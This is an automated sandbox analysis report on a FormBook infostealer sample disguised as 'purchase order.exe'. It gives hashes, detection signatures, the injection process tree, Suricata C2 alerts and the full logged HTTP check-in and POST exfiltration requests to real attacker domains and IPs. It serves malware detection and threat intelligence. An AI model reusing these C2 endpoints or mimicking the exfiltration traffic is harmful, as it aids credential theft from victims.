Windows Analysis Report
purchase order.exe

Overview

General Information

Sample name: purchase order.exe
Analysis ID: 1569753
MD5: 79bfe4cd6855c69c57c3b6b3a2ad898f
SHA1: f8e1d7de0aa66ac4a38d5b63d5e125d869ffe7a4
SHA256: c8040b1741912e0e0ecf072a20889dea7c880b6dfa1d0d1579c996a99779ac1f
Tags: exe, user-julianmckein

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses cacls to modify the permissions of files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • purchase order.exe (PID: 7556 cmdline: "C:\Users\user\Desktop\purchase order.exe" MD5: 79BFE4CD6855C69C57C3B6B3A2AD898F)
    • purchase order.exe (PID: 7900 cmdline: "C:\Users\user\Desktop\purchase order.exe" MD5: 79BFE4CD6855C69C57C3B6B3A2AD898F)
      • olMGHvjsNFhNU.exe (PID: 5332 cmdline: "C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • cacls.exe (PID: 7348 cmdline: "C:\Windows\SysWOW64\cacls.exe" MD5: 00BAAE10C69DAD58F169A3ED638D6C59)
          • olMGHvjsNFhNU.exe (PID: 5216 cmdline: "C:\Program Files (x86)\JqnOkYlhJiPbEpIEOaFrUkKyQACqOvJuFeBPNQkyoXShIpNPjSfYAaBYjIMBQobzvxajjMOKAMtO\olMGHvjsNFhNU.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 6012 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000007.00000002.3517878264.0000000003250000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000003.00000002.2358562508.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000007.00000002.3516914992.0000000002CD0000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000007.00000002.3517932349.00000000032A0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000003.00000002.2390943526.0000000004A30000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

Source | Rule | Description | Author | Strings
3.2.purchase order.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
3.2.purchase order.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

No Sigma rule has matched

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-06T09:32:50.567866+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49793 | 74.208.236.156 | 80 | TCP
2024-12-06T09:33:15.401198+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49854 | 84.32.84.32 | 80 | TCP
2024-12-06T09:33:30.175870+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49893 | 13.248.169.48 | 80 | TCP
2024-12-06T09:33:44.927682+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49928 | 66.29.149.46 | 80 | TCP
2024-12-06T09:33:59.682341+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49967 | 3.33.130.190 | 80 | TCP
2024-12-06T09:34:14.929015+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50005 | 129.226.153.85 | 80 | TCP
2024-12-06T09:34:30.508372+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50033 | 104.21.7.187 | 80 | TCP

                AV Detection

                Source: purchase order.exe, ReversingLabs: Detection: 34%
                Source: purchase order.exe, Virustotal: Detection: 40%
                Source: Yara match, File source: 3.2.purchase order.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 3.2.purchase order.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 00000007.00000002.3517878264.0000000003250000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000003.00000002.2358562508.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000007.00000002.3516914992.0000000002CD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000007.00000002.3517932349.00000000032A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000003.00000002.2390943526.0000000004A30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000003.00000002.2360246710.0000000002350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000006.00000002.3518031522.00000000034F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Submited Sample, Integrated Neural Analysis Model: Matched 100.0% probability
                Source: purchase order.exe, Joe Sandbox ML: detected
                Source: purchase order.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: purchase order.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: cacls.pdbGCTL source: purchase order.exe, 00000003.00000002.2358800767.00000000010C8000.00000004.00000020.00020000.00000000.sdmp, olMGHvjsNFhNU.exe, 00000006.00000002.3517608915.0000000000F28000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: cacls.pdb source: purchase order.exe, 00000003.00000002.2358800767.00000000010C8000.00000004.00000020.00020000.00000000.sdmp, olMGHvjsNFhNU.exe, 00000006.00000002.3517608915.0000000000F28000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: olMGHvjsNFhNU.exe, 00000006.00000000.2274072509.0000000000B4E000.00000002.00000001.01000000.0000000C.sdmp, olMGHvjsNFhNU.exe, 00000008.00000000.2434347774.0000000000B4E000.00000002.00000001.01000000.0000000C.sdmp
                Source: Binary string: wntdll.pdbUGP source: purchase order.exe, 00000003.00000002.2358964709.0000000001530000.00000040.00001000.00020000.00000000.sdmp, cacls.exe, 00000007.00000003.2361013060.0000000003365000.00000004.00000020.00020000.00000000.sdmp, cacls.exe, 00000007.00000003.2358877344.000000000319E000.00000004.00000020.00020000.00000000.sdmp, cacls.exe, 00000007.00000002.3518174469.0000000003510000.00000040.00001000.00020000.00000000.sdmp, cacls.exe, 00000007.00000002.3518174469.00000000036AE000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: purchase order.exe, purchase order.exe, 00000003.00000002.2358964709.0000000001530000.00000040.00001000.00020000.00000000.sdmp, cacls.exe, cacls.exe, 00000007.00000003.2361013060.0000000003365000.00000004.00000020.00020000.00000000.sdmp, cacls.exe, 00000007.00000003.2358877344.000000000319E000.00000004.00000020.00020000.00000000.sdmp, cacls.exe, 00000007.00000002.3518174469.0000000003510000.00000040.00001000.00020000.00000000.sdmp, cacls.exe, 00000007.00000002.3518174469.00000000036AE000.00000040.00001000.00020000.00000000.sdmp
                Source: C:\Windows\SysWOW64\cacls.exe, Code function: 7_2_02CEC940 FindFirstFileW,FindNextFileW,FindClose, 7_2_02CEC940
                Source: C:\Windows\SysWOW64\cacls.exe, Code function: 4x nop then mov dword ptr [ebp-0000008Ch], 00000000h, 7_2_02CD9E50
                Source: C:\Windows\SysWOW64\cacls.exe, Code function: 4x nop then xor eax, eax, 7_2_02CD9E50
                Source: C:\Windows\SysWOW64\cacls.exe, Code function: 4x nop then pop edi, 7_2_02CDE4AE
                Source: C:\Windows\SysWOW64\cacls.exe, Code function: 4x nop then mov dword ptr [ebp-0000008Ch], 00000000h, 7_2_02CD9E46
                Source: C:\Windows\SysWOW64\cacls.exe, Code function: 4x nop then mov ebx, 00000004h, 7_2_034104BE

                Networking

                Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49793 -> 74.208.236.156:80
                Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49854 -> 84.32.84.32:80
                Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49893 -> 13.248.169.48:80
                Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49928 -> 66.29.149.46:80
                Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49967 -> 3.33.130.190:80
                Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50005 -> 129.226.153.85:80
                Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50033 -> 104.21.7.187:80
                Source: DNS query: www.aktmarket.xyz
                Source: Joe Sandbox View, IP Address: 13.248.169.48
                Source: Joe Sandbox View, IP Address: 84.32.84.32
                Source: Joe Sandbox View, ASN Name: AMAZON-02US
                Source: Joe Sandbox View, ASN Name: CLOUDFLARENETUS
                Source: Joe Sandbox View, ASN Name: NTT-LT-ASLT
                Source: Joe Sandbox View, ASN Name: AMAZONEXPANSIONGB
                Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /raea/?yhXxt4VH=PqKj/8KuIq0WSNkKBtU6xtT3L0EMxYs1M43YI/iJd5qBB0feLv8ZTXGbO6iF0HlQbmuDykhZpdeI6maFWjpp4la8Hrjym6l49HTLUW+OY0E4RirZFYV27mA=&7j=yfeP18RhphLhR HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Host: www.christinascuties.netConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /jytl/?yhXxt4VH=g6hM5OfAy0aZTOdwti/FGwGF0lxL069nbH1D7PSRWxwlxqBVZ/VTfAfjReyEGXu+lurHf7fRU8SuqLFFtve4IM1EjQT2IGwGJnxeHmxIKuUG6sD+9Xyx6N0=&7j=yfeP18RhphLhR HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Host: www.techmiseajour.netConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /wb7v/?yhXxt4VH=IA0aHAKfw1DI7Bcblr+MbxWptTyqPXzIJhioZgrDgtprV+dFeA51d24/BswRkzzY9dVkqa6lP7qo/SE9ZBwND/F2b9kUq8bbEXkcoGvOpHRcusnJqNxo6xE=&7j=yfeP18RhphLhR HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Host: www.aktmarket.xyzConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /r2k9/?yhXxt4VH=R82aEe+RY/7ruopITyLMIZWKv2xl/sjUuvMRSLNb4ss61aauImbQUdGg0t6KhpFZbU646xYhPfN8HrEmx58z32+Zxn0+WKbZAwLkeWsMT5GXOfSG7vseuCs=&7j=yfeP18RhphLhR HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Host: www.golivenow.liveConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /rbqc/?yhXxt4VH=3OhzIPQDpE/WyOq4c54Fyv33ZIsYjpJwFHC8VhGgYWlBNCQMRbA04lYXhcibOdGaaYQUE3h/dXM8I7VGN3rliaUrIlqLG+JAYIZgOxd79aoCwxPUFZEjsrU=&7j=yfeP18RhphLhR HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Host: www.iglpg.onlineConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /pfw9/?yhXxt4VH=45l5W170mEENNSUnzK4z1bTcnj7w1ape/JClWAxqTX/Xh+MpzQee3AwDIBzH94Waz7MWeOxtR7oNILZ5PKGZPlZ4cFkLSrPaRO4QE3Rmb2BtP350cPbvkbU=&7j=yfeP18RhphLhR HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Host: www.1qcczjvh2.autosConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /4gxa/?yhXxt4VH=IVIViSCd4+diLw5hx6pqKzAzzXjH0VWsQQRVAN/m1p/rxaGnfzS1IkXZSHFapfjNT88wuN41KZDTvbIxWygy4ZsRlEWQLVi632NRXOHwjbynndNV+ecoPQE=&7j=yfeP18RhphLhR HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Host: www.gk88top.topConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                Source: global traffic, DNS traffic detected: DNS query: www.christinascuties.net
                Source: global traffic, DNS traffic detected: DNS query: www.techmiseajour.net
                Source: global traffic, DNS traffic detected: DNS query: www.aktmarket.xyz
                Source: global traffic, DNS traffic detected: DNS query: www.golivenow.live
                Source: global traffic, DNS traffic detected: DNS query: www.iglpg.online
                Source: global traffic, DNS traffic detected: DNS query: www.1qcczjvh2.autos
                Source: global traffic, DNS traffic detected: DNS query: www.gk88top.top
                Source: unknownHTTP traffic detected: POST /jytl/ HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Host: www.techmiseajour.netCache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 205Origin: http://www.techmiseajour.netReferer: http://www.techmiseajour.net/jytl/User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36 Data Ascii: yhXxt4VH=t4Js6+7a0GL8SYtkvy7mDh+3+X0Oo49UCRxh0f+2OQIHutJyauU5UQDaeLmKcmC43IL1GqrQUMONrowUuOOoKNUenR7mPmogG145EUtnIKZy8P32yjnhiOQuJ8zybmGviN+XbWjyFEXD7pMhxzd0jKybZj0eAaDUiGTqypOeAeB7ybAUZlbgfKpfkYwmeGYaLQ==
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 626Connection: closeDate: Fri, 06 Dec 2024 08:32:50 GMTServer: Apache Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Your browser can't find the document corresponding to the URL you typed in. </p> </body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 06 Dec 2024 08:33:36 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/html Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 06 Dec 2024 08:33:39 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/html Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 06 Dec 2024 08:33:42 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/html Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 06 Dec 2024 08:33:44 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/html; charset=utf-8 Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: TengineDate: Fri, 06 Dec 2024 08:34:06 GMTContent-Type: text/html; charset=utf-8Content-Length: 58288Connection: closeVary: Accept-EncodingETag: "67344967-e3b0"
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: TengineDate: Fri, 06 Dec 2024 08:34:09 GMTContent-Type: text/html; charset=utf-8Content-Length: 58288Connection: closeVary: Accept-EncodingETag: "67344967-e3b0"
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: TengineDate: Fri, 06 Dec 2024 08:34:14 GMTContent-Type: text/html; charset=utf-8Content-Length: 58288Connection: closeVary: Accept-EncodingETag: "67344967-e3b0"
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 06 Dec 2024 08:34:25 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rmOCNn8sTefxI4Gfk%2BRHsnYOaHFyC557m1c7u5N6D0itD91%2FuH0v7%2Bm%2BtsvNRCkDqFrxPmAxHCSUZknzxeIjJcoLZch4y1oGj8JNZdBacAUhgZ5Hdox3b%2Fd%2FLRrNbCvuQ5U%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8edaefc6f8d6434a-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1697&min_rtt=1697&rtt_var=848&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=690&delivery_rate=0&cwnd=226&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 06 Dec 2024 08:34:30 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RbI1T69%2F7I8Np3e3TU33p0QgYCVGOYcLkBtlm3w5vKavK46mwtWkd664WccANxvBdY%2B3kVVGjWRlZQlaWvtbotMeVvxMTmThaCrqbgIj8OaEwYeUQ2A419yq3I%2BENpqdOBk%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8edaefe85a668c60-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1884&min_rtt=1884&rtt_var=942&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=408&delivery_rate=0&cwnd=52&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                Source: cacls.exe, 00000007.00000002.3518525848.0000000003B3C000.00000004.10000000.00040000.00000000.sdmp, cacls.exe, 00000007.00000002.3517787544.0000000003196000.00000004.00000020.00020000.00000000.sdmp, olMGHvjsNFhNU.exe, 00000008.00000000.2434717461.0000000002F6C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2663319819.0000000023FAC000.00000004.80000000.00040000.00000000.sdmp, purchase order.exeString found in binary or memory: http://localhost/calculator_server/requests.php
                Source: purchase order.exe, 00000000.00000002.1847138195.0000000006932000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                Source: purchase order.exe, 00000000.00000002.1847138195.0000000006932000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                Source: purchase order.exe, 00000000.00000002.1847138195.0000000006932000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                Source: purchase order.exe, 00000000.00000002.1847138195.0000000006932000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                Source: purchase order.exe, 00000000.00000002.1847138195.0000000006932000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                Source: purchase order.exe, 00000000.00000002.1847138195.0000000006932000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                Source: purchase order.exe, 00000000.00000002.1847138195.0000000006932000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                Source: purchase order.exe, 00000000.00000002.1847138195.0000000006932000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                Source: purchase order.exe, 00000000.00000002.1847138195.0000000006932000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                Source: purchase order.exe, 00000000.00000002.1847138195.0000000006932000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                Source: purchase order.exe, 00000000.00000002.1847138195.0000000006932000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                Source: purchase order.exe, 00000000.00000002.1847138195.0000000006932000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                Source: purchase order.exe, 00000000.00000002.1847138195.0000000006932000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                Source: purchase order.exe, 00000000.00000002.1847138195.0000000006932000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                Source: purchase order.exe, 00000000.00000002.1847138195.0000000006932000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                Source: purchase order.exe, 00000000.00000002.1847138195.0000000006932000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                Source: olMGHvjsNFhNU.exe, 00000008.00000002.3517718165.0000000000FE5000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.gk88top.top
                Source: olMGHvjsNFhNU.exe, 00000008.00000002.3517718165.0000000000FE5000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.gk88top.top/4gxa/
                Source: purchase order.exe, 00000000.00000002.1847138195.0000000006932000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                Source: purchase order.exe, 00000000.00000002.1847138195.0000000006932000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                Source: purchase order.exe, 00000000.00000002.1847138195.0000000006932000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                Source: purchase order.exe, 00000000.00000002.1847138195.0000000006932000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                Source: purchase order.exe, 00000000.00000002.1847138195.0000000006932000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                Source: purchase order.exe, 00000000.00000002.1847138195.0000000006932000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                Source: purchase order.exe, 00000000.00000002.1847138195.0000000006932000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                Source: purchase order.exe, 00000000.00000002.1847138195.0000000006932000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                Source: purchase order.exe, 00000000.00000002.1847138195.0000000006932000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                Source: cacls.exe, 00000007.00000002.3519971247.0000000008018000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: cacls.exe, 00000007.00000002.3519971247.0000000008018000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: cacls.exe, 00000007.00000002.3519971247.0000000008018000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: cacls.exe, 00000007.00000002.3519971247.0000000008018000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: cacls.exe, 00000007.00000002.3518525848.00000000043DA000.00000004.10000000.00040000.00000000.sdmp, olMGHvjsNFhNU.exe, 00000008.00000002.3518272812.000000000380A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://codepen.io/uzcho_/pen/eYdmdXw.css
                Source: cacls.exe, 00000007.00000002.3518525848.00000000043DA000.00000004.10000000.00040000.00000000.sdmp, olMGHvjsNFhNU.exe, 00000008.00000002.3518272812.000000000380A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://codepen.io/uzcho_/pens/popular/?grid_type=list
                Source: cacls.exe, 00000007.00000002.3519971247.0000000008018000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: cacls.exe, 00000007.00000002.3519971247.0000000008018000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: cacls.exe, 00000007.00000002.3519971247.0000000008018000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
